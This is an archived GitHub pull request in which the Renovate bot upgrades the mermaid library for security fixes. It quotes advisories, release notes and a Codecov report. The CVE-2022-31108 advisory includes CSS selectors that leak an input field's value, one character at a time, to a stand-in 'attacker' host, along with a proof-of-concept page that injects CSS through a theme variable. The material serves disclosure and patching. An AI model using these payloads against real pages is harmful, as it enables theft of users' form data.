Skip to content
This repository was archived by the owner on Dec 5, 2024. It is now read-only.

chore(deps): update dependency mermaid to v9 [security] #635

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

chore(deps): update dependency mermaid to v9 [security] #635

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link

@renovate renovate bot commented Dec 10, 2021
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
mermaid ^8.10.2 -> ^9.0.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2021-35513

Mermaid before 8.11.0 allows XSS when the antiscript feature is used.

CVE-2021-43861

Impact

Malicious diagrams can contain javascript code that can be run at diagram readers machines.

Patches

The users should upgrade to version 8.13.8

Workarounds

You need to upgrade in order to avoid this issue.

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the value attribute one character at a time. Whenever there is an actual match, an http request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.

Release Notes

mermaid-js/mermaid (mermaid)

v9.1.2

Compare Source

Release Notes

🚀 Features

Bug Fixes & Cleanup

Documentation

Dependecy updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.1

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.0

Compare Source

Release Notes

🚀 Features

Documentation

Dependecy updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.1

Compare Source

Release Notes

🐛 Bug Fixes

  • Removal of vulnerability (#​2958) @​knsv
  • Fix broken re-rendering of gitGraph in Mermaid Live Editor

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.0

Compare Source

Release Notes

Main feature

Moving the gitGraph from experimental alpha status to a fully supported diagram type which handles theming and directives. The grammar has changed slightly from the alpha version, and no longer supports reset operations and some internal fast-forwarding has been removed for simplicity. Some few GitGraphs based on the alpha version might break with the update. This is the reason for the major version number update.

We now support:

  • Commit types
  • Multiple branches in sperate lanes
  • Theming

Other changes:

Documentation updates

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.14.0

Compare Source

Release Notes

Main feature

  • Adding new more secure security level 'sandbox' where all rendering happens in a sandboxed iframe. The returned element in this mode is also an iframe with the svg as a base64 encoded url. (#​2654)

Documentation updates

Dependecy updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.10

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.9

Compare Source

Release Notes

Changes to the functionality

Documentation changes

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

[v8.13.8](https://redirect.github.com/mermaid-js/mermaid/rele

@renovate renovate bot added the renovate label Dec 10, 2021
@codecov
Copy link

codecov bot commented Dec 10, 2021
edited
Loading

Codecov Report

Base: 84.55% // Head: 84.55% // No change to project coverage 👍

Coverage data is based on head (a9a66a2) compared to base (b27ba01).
Patch has no changes to coverable lines.

❗ Current head a9a66a2 differs from pull request most recent head f5fd4b0. Consider uploading reports for the commit f5fd4b0 to get more accurate results

Additional details and impacted files 
@@           Coverage Diff           @@
##           master     #635   +/-   ##
=======================================
  Coverage   84.55%   84.55%           
=======================================
  Files          11       11           
  Lines         259      259           
  Branches       48       48           
=======================================
  Hits          219      219           
  Misses          6        6           
  Partials       34       34

Help us with your feedback. Take ten seconds to tell us how you rate us. Have a feature suggestion? Share it here.

☔ View full report at Codecov.
📢 Do you have feedback about the report comment? Let us know in this issue.

@renovate renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from 5f70498 to a9a66a2 Compare January 6, 2022 20:26
@renovate renovate bot changed the title chore(deps): update dependency mermaid to 8.11.0 [security] chore(deps): update dependency mermaid to 8.13.8 [security] Jan 6, 2022
@renovate renovate bot changed the title chore(deps): update dependency mermaid to 8.13.8 [security] chore(deps): update dependency mermaid to 9.1.2 [security] Sep 25, 2022
@renovate renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from a9a66a2 to f5fd4b0 Compare September 25, 2022 18:57
@renovate renovate bot changed the title chore(deps): update dependency mermaid to 9.1.2 [security] chore(deps): update dependency mermaid to v9 [security] Mar 24, 2023
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
renovate
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants